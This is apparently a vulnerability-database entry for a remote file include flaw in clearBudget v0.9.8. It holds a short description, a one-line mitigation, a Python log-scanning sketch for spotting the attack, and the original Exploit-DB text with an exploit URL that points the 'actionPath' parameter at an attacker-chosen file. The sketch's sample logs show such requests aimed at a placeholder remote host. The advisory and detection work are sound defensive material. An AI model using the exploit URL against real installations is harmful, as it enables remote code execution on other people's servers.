Vendor: clearBudget
By: Offensive
CVSS: 7.5 (HIGH)
CWE: 98 (Remote File Include)
Product Name: clearBudget
Affected Version From: v0.9.8
Affected Version To: v0.9.8
Patch Exists: NO
Related CWE: N/A
CPE: a:clearbudget:clearbudget:0.9.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2010

clearBudget v0.9.8 Remote File Include

A Remote File Include vulnerability exists in clearBudget v0.9.8. The 'actionPath' parameter of the 'controller.class.php' script is not properly sanitized before being used to include a file. An attacker can exploit this by sending a crafted HTTP request with a URL in the 'actionPath' parameter, causing the application to include a remote file containing malicious code and execute it on the vulnerable system.

Mitigation:

Input validation should be used to ensure that untrusted input is not used to include or execute files.
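
No patch exists, so web server logs are the place to check whether the request described above has reached a deployment. The following detection sketch is an added example, not code from the advisory or from clearBudget; the combined-style log format, the sample lines, the index.php request and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

SCRIPT = "/logic/controller.class.php"  # script named in the advisory
PARAM = "actionPath"                    # parameter named in the advisory

# Combined/common log format: client, ident, user, [time], "METHOD target PROTO", status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Any value that begins with scheme:// is a URL, which a file include should never receive
URL_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)

# Constructed sample lines (documentation IP range, reserved .invalid host), not real traffic
SAMPLE_LOG = """\
192.0.2.10 - - [10/Aug/2010:10:00:01 +0000] "GET /clearBudget.0.9.8/index.php HTTP/1.1" 200 5120
192.0.2.44 - - [10/Aug/2010:10:02:17 +0000] "GET /clearBudget.0.9.8/logic/controller.class.php?actionPath=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 312
192.0.2.44 - - [10/Aug/2010:10:02:40 +0000] "GET /clearBudget.0.9.8/logic/controller.class.php?actionPath=HTTP://example.invalid/y.txt HTTP/1.1" 200 298
192.0.2.51 - - [10/Aug/2010:10:05:03 +0000] "GET /clearBudget.0.9.8/logic/controller.class.php?actionPath=actions/ HTTP/1.1" 200 0
"""

def classify(line):
    """Return None for unrelated lines, otherwise a finding dict."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, _method, target, status = m.groups()
    url = urlsplit(target)
    # The advisory's test platform is Windows, where paths are case-insensitive
    if not url.path.lower().endswith(SCRIPT):
        return None
    # parse_qs percent-decodes once, matching what PHP hands to the script
    values = parse_qs(url.query, keep_blank_values=True).get(PARAM)
    if values is None:
        return None
    remote = any(URL_RE.match(v) for v in values)
    return {
        "client": client,
        "status": int(status),
        "value": values[0],
        # A class file requested directly with actionPath set is already unusual;
        # a URL in the value matches the advisory's description.
        "severity": "remote-url" if remote else "direct-access",
    }

def scan(log_text):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "remote-url" finding with a 200 status is worth correlating with outbound connections from the web server at the same timestamp.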

Exploit-DB raw data:

# Exploit Title: clearBudget v0.9.8 Remote File Include
# Date: 10/08/2010
# Author: Offensive [Offsensive@live.com] ~ Red-Stone On Community !
# Software Link: [ http://www.clearbudget.net ]
# Version : v0.9.8
# Tested on: Windows XP

C0nditi0ns : PHP Version > 4.x.x
Expl0it Code : http://target/clearBudget.0.9.8/logic/controller.class.php?actionPath=[file]

Ramadan Kareem !
Gr33t'z : SA-h4x0r ~ LoOoRd ~ Inj3ct0r M3ms & T3am